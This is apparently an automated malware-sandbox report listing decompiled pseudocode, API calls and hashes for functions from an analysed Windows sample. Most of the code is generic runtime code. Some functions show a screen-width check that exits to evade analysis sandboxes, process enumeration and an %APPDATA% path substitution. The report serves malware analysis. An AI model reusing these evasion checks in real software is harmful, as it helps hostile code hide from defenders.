Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 73090415-1405518554
Opcode ID: 9fee511d0ef6d7a830ea1a3b1d28947fa013327051b7f98ee101d57074cd0139
Instruction ID: fd6514765bdcf79f8545fbaf4bbdf44a8ebdcfedeb7616e3073ae32d4a666833
Opcode Fuzzy Hash: 9fee511d0ef6d7a830ea1a3b1d28947fa013327051b7f98ee101d57074cd0139
Instruction Fuzzy Hash: 3211B6B1905758AFC710DF59D880A9AFBF8FB18300F50866FF45593741D738A608CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00420440 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00420440(char* _a4, char* _a8, intOrPtr _a12) {
				char* _t14;
				char* _t17;
				void* _t18;
				void* _t20;
				CHAR* _t21;

				_t14 = _a4;
				_t17 = StrStrA(_t14, _a8);
				if(_t17 != 0) {
					_t20 = _t17 - _t14;
					 *0x4647d8(0x463e80, _t14, _t20, _t18);
					_t21 = _t20 + 0x463e80;
					 *_t21 = 0;
					wsprintfA(_t21, "%s%s", _a12, E0042BC70(_a8) + _t17);
					return 0x463e80;
				} else {
					return _t14;
				}
			}

0x00420447
0x00420453
0x00420457
0x00420462
0x0042046b
0x00420474
0x0042047b
0x00420490
0x004204a2
0x0042045a
0x0042045e
0x0042045e

APIs

StrStrA.SHLWAPI(000F4240,00000000,?,00000000,?,0040D2AC,?,%APPDATA%,00000000,0000001A,00000000,000F4240,00000000), ref: 0042044D
lstrcpyn.KERNEL32(00463E80,000F4240,00000000,?,?,0040D2AC,?,%APPDATA%,00000000,0000001A,00000000,000F4240,00000000), ref: 0042046B
_strlen.LIBCMT ref: 0042047E
wsprintfA.USER32 ref: 00420490

Strings

%s%s, xrefs: 0042048A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlenlstrcpynwsprintf
String ID: %s%s
API String ID: 3492880386-3252725368
Opcode ID: b41fd36ef5c08dcb1ebf6122337148f83c2db00a49dc7fe389cce9e313dc00f8
Instruction ID: 09489532822d853164478222054529543097ebc9302f05a7fa98e1c1603bd0f2
Opcode Fuzzy Hash: b41fd36ef5c08dcb1ebf6122337148f83c2db00a49dc7fe389cce9e313dc00f8
Instruction Fuzzy Hash: C6F0C2722012547BDB005F5DEC44D67779DEFC5369711412AF90C87201D6B59D1082BA

Uniqueness

Uniqueness Score: -1.00%

Function 004303D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E004303D9(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00430347(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0042C646(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0042FDB8(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E0043002C(_t22,  *_t14, _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E0042C60D(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x004303d9
0x004303d9
0x004303d9
0x004303d9
0x004303d9
0x004303de
0x004303e2
0x004303e4
0x004303e7
0x004303e8
0x004303e9
0x004303ec
0x004303f1
0x004303f1
0x004303f4
0x004303f8
0x004303fb
0x00430400
0x004303fd
0x004303fd
0x004303fd
0x00430403
0x00430408
0x0043040a
0x0043040d
0x00430410
0x00430411
0x00430419
0x0043041e
0x00430422
0x00430425
0x00430428
0x0043042b
0x0043042e
0x0043042f
0x00430432
0x0043043c
0x00430440
0x00000000
0x00430440
0x00430446

APIs

___BuildCatchObject.LIBCMT ref: 004303EC

Part of subcall function 00430347: ___BuildCatchObjectHelper.LIBCMT ref: 0043037D

_UnwindNestedFrames.LIBCMT ref: 00430403
___FrameUnwindToState.LIBCMT ref: 00430411

Strings

csm, xrefs: 004303E8, 004303FD, 00430410, 0043042E, 0043043E
csm, xrefs: 004303DB

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5b1a0999ae024904e0bceb72a9c88598a89ac24931b0b6493141f5475e173f90
Instruction ID: 454cd5478092acb51c2c88aa6320d1cced454ef1ba99013b3623bd502830d9ea
Opcode Fuzzy Hash: 5b1a0999ae024904e0bceb72a9c88598a89ac24931b0b6493141f5475e173f90
Instruction Fuzzy Hash: 1D012431000119BBCF226F52DC45EAB7E6AEF08348F508116BD1824221DB3AD9A2DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E800 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041E800() {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				void* __esi;
				signed int _t10;
				CHAR* _t13;
				intOrPtr _t20;
				intOrPtr _t27;
				signed int _t29;

				_t10 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t10 ^ _t29;
				_t13 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_t28 = _t13;
				GetLocalTime( &_v24);
				wsprintfA(_t13, "%d/%d/%d %d:%d:%d", _v24.wDay & 0x0000ffff, _v24.wMonth & 0x0000ffff, _v24.wYear & 0x0000ffff, _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff);
				return E0042A36A(_t13, _t20, _v8 ^ _t29, _v24.wMonth & 0x0000ffff, _t27, _t28);
			}

0x0041e806
0x0041e80d
0x0041e81f
0x0041e825
0x0041e82b
0x0041e855
0x0041e86e

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000010,?,?,?,?,0040C8DA), ref: 0041E818
HeapAlloc.KERNEL32(00000000,?,?,?,?,0040C8DA), ref: 0041E81F
GetLocalTime.KERNEL32(?,?,?,?,?,0040C8DA), ref: 0041E82B
wsprintfA.USER32 ref: 0041E855

Strings

%d/%d/%d %d:%d:%d, xrefs: 0041E84F

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID: %d/%d/%d %d:%d:%d
API String ID: 1243822799-1073349071
Opcode ID: c7f040a9b5a91c80fb1e58934fc26fe8affd60aee209242316514aa60fcafe14
Instruction ID: 123aead8712be4c7d96d837ba364a7341dd609661f6fe7a41410dccaf579b217
Opcode Fuzzy Hash: c7f040a9b5a91c80fb1e58934fc26fe8affd60aee209242316514aa60fcafe14
Instruction Fuzzy Hash: 9CF04475900228BBDB04AFD59D099BFB7F8EF48B02F00415AFD45A2180F6B85A50D77A

Uniqueness

Uniqueness Score: -1.00%

Function 0042FD69 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042FD69(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t13;
				void* _t16;
				intOrPtr* _t20;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t24 = __ebx;
				_t13 =  *((intOrPtr*)( *_a4));
				if(_t13 == 0xe0434352 || _t13 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E004324B4(_t24, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E004324B4(_t24, _t25, __eflags);
						_t5 = _t16 + 0x90;
						 *_t5 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t5;
					}
					goto L6;
				} else {
					_t34 = _t13 - 0xe06d7363;
					if(_t13 != 0xe06d7363) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						 *(E004324B4(__ebx, __edx, _t34) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
						_push(8);
						_push(0x44d488);
						E00433750(__ebx, __edi, __esi);
						_t20 =  *((intOrPtr*)(E004324B4(_t24, __edx, _t34) + 0x78));
						if(_t20 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t20();
							_v8 = 0xfffffffe;
						}
						return E00433795(E004309C6(_t24, _t25, _t26, _t27));
					}
				}
			}

0x0042fd69
0x0042fd69
0x0042fd69
0x0042fd69
0x0042fd73
0x0042fd7a
0x0042fda0
0x0042fda7
0x0042fda9
0x0042fdae
0x0042fdae
0x0042fdae
0x0042fdae
0x00000000
0x0042fd83
0x0042fd83
0x0042fd88
0x0042fdb4
0x0042fdb4
0x0042fdb7
0x0042fd8a
0x0042fd8f
0x00432778
0x0043277a
0x0043277f
0x00432789
0x0043278e
0x00432790
0x00432794
0x0043279f
0x0043279f
0x004327b0
0x004327b0
0x0042fd88

APIs

__getptd.LIBCMT ref: 0042FD8A

Part of subcall function 004324B4: __getptd_noexit.LIBCMT ref: 004324B7
Part of subcall function 004324B4: __amsg_exit.LIBCMT ref: 004324C4

__getptd.LIBCMT ref: 0042FD9B
__getptd.LIBCMT ref: 0042FDA9

Strings

MOC, xrefs: 0042FD7C
RCC, xrefs: 0042FD75

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC
API String ID: 803148776-2084237596
Opcode ID: 628f51008de2a06c95f7331aae7603a2a12608d9235a577c6d25e3d9c6ac0060
Instruction ID: d737a7e8420f2798f9c476edb04095d3cb1a9b5233d5300b94d1c42c58f1fc71
Opcode Fuzzy Hash: 628f51008de2a06c95f7331aae7603a2a12608d9235a577c6d25e3d9c6ac0060
Instruction Fuzzy Hash: C1E012312241148EC7149B69E68A76932E4BB58318F9610B7E48DC7323C76CE954558A

Uniqueness

Uniqueness Score: -1.00%

Function 004010F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004010F0() {
				int _t2;
				int _t3;
				struct HDC__* _t8;

				_t8 = CreateDCA("DISPLAY", 0, 0, 0);
				_t2 = GetDeviceCaps(_t8, 8);
				_t3 = ReleaseDC(0, _t8);
				if(_t2 < 0x299) {
					ExitProcess(0);
				}
				return _t3;
			}

0x00401103
0x00401108
0x00401113
0x00401121
0x00401125
0x00401125
0x0040112b

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004010FD
GetDeviceCaps.GDI32(00000000,00000008), ref: 00401108
ReleaseDC.USER32 ref: 00401113
ExitProcess.KERNEL32 ref: 00401125

Strings

DISPLAY, xrefs: 004010F8

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CapsCreateDeviceExitProcessRelease
String ID: DISPLAY
API String ID: 272768826-865373369
Opcode ID: c0fbeebc536ed2e7cc15fd8623bd5810db434b01e40f68436100a2b132c965c3
Instruction ID: 98633e245eb045a58ba308e68d2c98a621a3b598bd8f1b4d1e38bc49ffa2d36b
Opcode Fuzzy Hash: c0fbeebc536ed2e7cc15fd8623bd5810db434b01e40f68436100a2b132c965c3
Instruction Fuzzy Hash: 3AE0123A7C16107BEA701765BC0EF4A2B14EB87B62F200031F709AE0D085B4145586AC

Uniqueness

Uniqueness Score: -1.00%

Function 00427080 Relevance: 7.6, APIs: 5, Instructions: 128
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00427080(intOrPtr __ecx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				signed int _v28;
				signed short _v32;
				struct _FILETIME _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				long _t44;
				intOrPtr _t48;
				intOrPtr _t54;
				intOrPtr* _t61;
				intOrPtr _t68;
				intOrPtr _t81;
				void* _t83;
				intOrPtr _t84;
				signed int _t85;

				_t41 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t41 ^ _t85;
				_t84 = __ecx;
				_t83 = _a4;
				_t61 = __ecx + 0x70;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x84)) = 0;
				 *((char*)(__ecx + 0x80)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *_t61 = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				if(_t83 == 0 || _t83 == 0xffffffff) {
					_t44 = 0x10000;
					goto L9;
				} else {
					if(SetFilePointer( *(__ecx + 4), 0, 0, 1) == 0xffffffff) {
						_t48 = _a8;
						 *((intOrPtr*)(_t84 + 0x4c)) = 0x80000000;
						 *_t61 = 0xffffffff;
						if(_t48 != 0) {
							 *_t61 = _t48;
						}
						 *((char*)(_t84 + 0x6c)) = 0;
						GetLocalTime( &_v24);
						SystemTimeToFileTime( &_v24,  &_v40);
						E00426A30(_v40.dwLowDateTime, _v40.dwHighDateTime,  &_v32,  &_v28);
						_t81 = _v40.dwLowDateTime - 0xd53e8000;
						asm("sbb eax, 0x19db1de");
						_t54 = E0042CF60(_t81, _v40.dwHighDateTime, 0x989680, 0);
						_t68 = _t81;
						 *((intOrPtr*)(_t84 + 0x5c)) = _t68;
						 *((intOrPtr*)(_t84 + 0x64)) = _t68;
						 *((intOrPtr*)(_t84 + 0x54)) = _t81;
						 *(_t84 + 0x7c) = _t83;
						 *((intOrPtr*)(_t84 + 0x50)) = _t54;
						 *((intOrPtr*)(_t84 + 0x58)) = _t54;
						 *((intOrPtr*)(_t84 + 0x60)) = _t54;
						 *(_t84 + 0x68) = (_v32 & 0x0000ffff) << 0x00000010 | _v28 & 0x0000ffff;
						return E0042A36A(0, _t61, _v8 ^ _t85, _v28 & 0x0000ffff, _t83, _t84);
					} else {
						_t77 = _t84 + 0x50;
						_t44 = E00426AB0(_t61, _t83, _t84 + 0x4c, _t61, _t84 + 0x50, _t84 + 0x68);
						if(_t44 != 0) {
							L9:
							return E0042A36A(_t44, _t61, _v8 ^ _t85, _t77, _t83, _t84);
						} else {
							SetFilePointer(_t83, _t44, _t44, _t44);
							 *(_t84 + 0x7c) = _t83;
							 *((char*)(_t84 + 0x6c)) = 1;
							return E0042A36A(0, _t61, _v8 ^ _t85, _t77, _t83, _t84);
						}
					}
				}
			}

0x00427086
0x0042708d
0x00427094
0x00427097
0x0042709a
0x0042709d
0x004270a0
0x004270a6
0x004270ac
0x004270af
0x004270b1
0x004270b7
0x004270bc
0x004271c7
0x00000000
0x004270cb
0x004270dc
0x00427122
0x00427125
0x0042712c
0x00427134
0x00427136
0x00427136
0x0042713c
0x00427140
0x0042714e
0x00427164
0x00427174
0x0042717f
0x00427186
0x0042718b
0x0042718d
0x00427190
0x00427197
0x004271a3
0x004271a7
0x004271aa
0x004271ad
0x004271b0
0x004271c4
0x004270de
0x004270e2
0x004270ec
0x004270f6
0x004271cc
0x004271dc
0x004270fc
0x00427100
0x00427106
0x0042710a
0x0042711f
0x0042711f
0x004270f6
0x004270dc

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,00000000,?,?,?,?,?,00428DCA,?,0040A082), ref: 004270D3
SetFilePointer.KERNEL32(0040A082,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00428DCA,?), ref: 00427100
GetLocalTime.KERNEL32(?,?,?,?,?,?,00428DCA,?,0040A082), ref: 00427140
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,00428DCA,?,0040A082), ref: 0042714E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427186

Part of subcall function 00426AB0: GetFileInformationByHandle.KERNEL32(?,?,0040A082,?), ref: 00426ADF

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 89576305-0
Opcode ID: a6580fdf646f567872c5e78785588377ec8979281a84a096de533de534a27002
Instruction ID: 667a71b401c2e58414e253ff06399cba508625ea06e2c388fb1f741e0810b9d1
Opcode Fuzzy Hash: a6580fdf646f567872c5e78785588377ec8979281a84a096de533de534a27002
Instruction Fuzzy Hash: 3F419EB1A007149FD724DF69D880ABBB7F8FF48700F404A2EE856D3690E774A904CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0043688E Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0043688E(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x465568, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x465570 - _t7;
								if(__eflags == 0) {
									_t9 = E0042FC8F(__eflags);
									 *_t9 = E0042FC4D(GetLastError());
									goto L17;
								} else {
									__eflags = E00431367(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E0042FC8F(__eflags);
										 *_t12 = E0042FC4D(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00431367(_t6, _t30);
						 *((intOrPtr*)(E0042FC8F(__eflags))) = 0xc;
						goto L12;
					} else {
						E0042BE8C(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0042BDF8(__edx, __edi, __esi, _a8);
				}
			}

0x00436897
0x004368a4
0x004368a5
0x004368a8
0x004368aa
0x004368b9
0x004368ec
0x004368ec
0x004368ef
0x00000000
0x00000000
0x004368bc
0x004368be
0x004368c0
0x004368c0
0x004368c0
0x004368cd
0x004368d3
0x004368d5
0x004368d7
0x00436937
0x00436937
0x004368d9
0x004368d9
0x004368df
0x00436921
0x00436935
0x00000000
0x004368e1
0x004368e8
0x004368ea
0x00436909
0x0043691d
0x00436903
0x00436903
0x00436903
0x00000000
0x00000000
0x00000000
0x004368ea
0x004368df
0x00000000
0x00436905
0x004368f2
0x004368fd
0x00000000
0x004368ac
0x004368af
0x004368b5
0x004368b5
0x00436906
0x00436908
0x00436899
0x004368a3
0x004368a3

APIs

_malloc.LIBCMT ref: 0043689C

Part of subcall function 0042BDF8: __FF_MSGBANNER.LIBCMT ref: 0042BE11
Part of subcall function 0042BDF8: __NMSG_WRITE.LIBCMT ref: 0042BE18
Part of subcall function 0042BDF8: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,0042C560,?), ref: 0042BE3D

_free.LIBCMT ref: 004368AF

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: f04ea8c6ce7ae8508b153c9b7a0ba0fc800d6f073cfbaec2ac48637facee39e3
Instruction ID: 2154a4a2b3761680a9a59cd0f1c66be01bb3b62b779ce2172498656be935a6b6
Opcode Fuzzy Hash: f04ea8c6ce7ae8508b153c9b7a0ba0fc800d6f073cfbaec2ac48637facee39e3
Instruction Fuzzy Hash: 4011E63250551ABADB253B36BC0475A3B99AF4D3A0F62903FFC5586260EB3C8841869D

Uniqueness

Uniqueness Score: -1.00%

Function 00418820 Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00418820() {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				void* __ecx;
				signed int _t15;
				void* _t23;
				intOrPtr _t28;
				intOrPtr _t36;
				signed int _t38;
				void* _t39;
				void* _t40;

				_push(0xffffffff);
				_push(E0043ECE4);
				_push( *[fs:0x0]);
				_push(_t28);
				_t15 =  *0x451f00; // 0xc21d6f0a
				_push(_t15 ^ _t38);
				 *[fs:0x0] =  &_v16;
				_t36 = _t28;
				_v20 = _t36;
				_v8 = 4;
				E00429BC4(_t36);
				_t19 =  *((intOrPtr*)(_t36 + 0x1c));
				_t40 = _t39 + 4;
				if( *((intOrPtr*)(_t36 + 0x1c)) != 0) {
					E0042BE8C(_t19);
					_t40 = _t40 + 4;
				}
				 *((intOrPtr*)(_t36 + 0x1c)) = 0;
				_t20 =  *((intOrPtr*)(_t36 + 0x14));
				if( *((intOrPtr*)(_t36 + 0x14)) != 0) {
					E0042BE8C(_t20);
					_t40 = _t40 + 4;
				}
				 *((intOrPtr*)(_t36 + 0x14)) = 0;
				_t21 =  *((intOrPtr*)(_t36 + 0xc));
				if( *((intOrPtr*)(_t36 + 0xc)) != 0) {
					E0042BE8C(_t21);
					_t40 = _t40 + 4;
				}
				 *((intOrPtr*)(_t36 + 0xc)) = 0;
				_t22 =  *((intOrPtr*)(_t36 + 4));
				if( *((intOrPtr*)(_t36 + 4)) != 0) {
					E0042BE8C(_t22);
				}
				 *((intOrPtr*)(_t36 + 4)) = 0;
				_v8 = 0xffffffff;
				_t23 = E00429A43(_t36);
				 *[fs:0x0] = _v16;
				return _t23;
			}

0x00418823
0x00418825
0x00418830
0x00418831
0x00418834
0x0041883b
0x0041883f
0x00418845
0x00418847
0x0041884b
0x00418852
0x00418857
0x0041885c
0x00418861
0x00418864
0x00418869
0x00418869
0x0041886c
0x0041886f
0x00418874
0x00418877
0x0041887c
0x0041887c
0x0041887f
0x00418882
0x00418887
0x0041888a
0x0041888f
0x0041888f
0x00418892
0x00418895
0x0041889a
0x0041889d
0x004188a2
0x004188a7
0x004188aa
0x004188b1
0x004188b9
0x004188c6

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418852

Part of subcall function 00429BC4: _setlocale.LIBCMT ref: 00429BD6

_free.LIBCMT ref: 00418864

Part of subcall function 0042BE8C: HeapFree.KERNEL32(00000000,00000000,?,004324A5,00000000,?,?,0042FC94,0042BE81,?), ref: 0042BEA2
Part of subcall function 0042BE8C: GetLastError.KERNEL32(00000000,?,004324A5,00000000,?,?,0042FC94,0042BE81,?), ref: 0042BEB4

_free.LIBCMT ref: 00418877
_free.LIBCMT ref: 0041888A
_free.LIBCMT ref: 0041889D

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: f278a95c37eee55f195256c165877de9c0fbb3f258fed84664a40615de5e0132
Instruction ID: d030288f47398f376366399e140f24d13b46c8b213a7e55b58bc7fecc7c37b14
Opcode Fuzzy Hash: f278a95c37eee55f195256c165877de9c0fbb3f258fed84664a40615de5e0132
Instruction Fuzzy Hash: 1511BFB1E00A549BC720DF5AE801A8BF7E9EF40714F544A2FF45AC3740EB79E904CA95

Uniqueness

Uniqueness Score: -1.00%

Function 00420900 Relevance: 7.6, APIs: 5, Instructions: 54
processCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00420900(intOrPtr _a4) {
				signed int _v8;
				char _v268;
				void* _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t18;
				intOrPtr _t21;
				intOrPtr _t26;
				void* _t27;
				signed int _t28;
				void* _t29;

				_t9 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t9 ^ _t28;
				_t26 = _a4;
				_t21 = 0;
				_v304 = 0x128;
				_t27 = CreateToolhelp32Snapshot(2, 0);
				if(Process32First(_t27,  &_v304) != 0 && Process32Next(_t27,  &_v304) != 0) {
					do {
						_t25 =  &_v268;
						_t18 = E0043AD6F(_t26, _t27,  &_v268, _t26);
						_t29 = _t29 + 8;
						if(_t18 == 0) {
							_t21 = 1;
						}
					} while (Process32Next(_t27,  &_v304) != 0);
				}
				CloseHandle(_t27);
				return E0042A36A(_t21, _t21, _v8 ^ _t28, _t25, _t26, _t27);
			}

0x00420909
0x00420910
0x00420916
0x0042091d
0x0042091f
0x0042092e
0x0042093f
0x00420952
0x00420952
0x0042095a
0x0042095f
0x00420964
0x00420966
0x00420966
0x00420975
0x00420952
0x0042097a
0x00420992

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00420929
Process32First.KERNEL32(00000000,00000128), ref: 00420938
Process32Next.KERNEL32 ref: 00420949
Process32Next.KERNEL32 ref: 00420970
CloseHandle.KERNEL32(00000000,00000010,0000000F,00000000), ref: 0042097A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2284531361-0
Opcode ID: 3553dfaa4c0683c1122ec60b8cc746213a5fb7775db952f57ab35e6c7ba22e0a
Instruction ID: b5744f7673fbe854e8f6917088e1e57d8b803ac526a556d7ba945948c45345f4
Opcode Fuzzy Hash: 3553dfaa4c0683c1122ec60b8cc746213a5fb7775db952f57ab35e6c7ba22e0a
Instruction Fuzzy Hash: BC019B717011289ED710AB32AC01AEF73ACDF56744F8040ABED4596142EB38DE54CAE9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7E0 Relevance: 7.5, APIs: 5, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040B7E0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				char _v1008;
				char _v2008;
				signed int _t10;
				intOrPtr _t29;
				signed int _t33;
				void* _t38;

				_t38 = __eflags;
				_t10 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t10 ^ _t33;
				E0042A2F0( &_v1008, 0, 0x3e8);
				E0042A2F0( &_v2008, 0, 0x3e8);
				_t29 =  *0x453698; // 0x25c8af8
				 *0x464860( &_v2008, _t29);
				 *0x464860( &_v1008, E00420650(__ebx, __edi, __esi, 0x1a));
				 *0x464860( &_v2008);
